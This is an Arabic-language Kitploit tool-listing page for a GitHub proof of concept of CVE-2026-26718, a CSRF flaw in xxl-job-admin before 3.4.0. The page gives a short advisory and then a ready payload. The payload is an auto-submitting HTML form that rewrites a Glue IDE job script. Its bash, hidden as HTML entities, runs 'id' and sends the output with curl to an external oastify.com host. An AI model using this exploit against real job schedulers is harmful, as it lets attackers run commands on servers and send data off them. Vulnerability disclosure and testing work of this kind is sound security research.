Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26718 — توجد ثغرة أمنية من نوع Cross-Site Request Forgery (CSRF) في تطبيق الويب xxl-job-admin تسمح للمهاجم بإجراء تعديلات غير مصرح بها على سكريبتات شل الخاصة بـ Glue IDE. لا يقوم نقطة النهاية المتأثرة بالتحقق السليم من رمز CSRF وتقبل أي طرق HTTP عشوائية عبر تعيين طلب متساهل. | Kitploit
أدوات/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
تحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

توجد ثغرة أمنية من نوع Cross-Site Request Forgery (CSRF) في تطبيق الويب xxl-job-admin تسمح للمهاجم بإجراء تعديلات غير مصرح بها على سكريبتات شل الخاصة بـ Glue IDE. لا يقوم نقطة النهاية المتأثرة بالتحقق السليم من رمز CSRF وتقبل أي طرق HTTP عشوائية عبر تعيين طلب متساهل.

عرض المستودع
13منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

ملخص

توجد ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في تطبيق الويب xxl-job-admin تسمح للمهاجم بإجراء تعديلات غير مصرح بها على نصوص شل الخاصة بـ Glue IDE. يفتقر نقطة النهاية المتأثرة إلى التحقق المناسب من رمز CSRF وتقبل طرق HTTP عشوائية عبر تعيين طلب متساهل.

المنتجات المتأثرة

root@kitploit:~
xxl-job < 3.4.0

التأثير

يمكن للمهاجم خداع مسؤول مصادق عليه لإجراء تغييرات غير مصرح بها على نصوص شل الخاصة بـ Glue IDE.

إثبات المفهوم

Slide1 Slide2 Slide3 Slide4

الحمولة

root@kitploit:~

// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

الاعتماد لـ Ibrahim Sartawi

تنزيل الأداة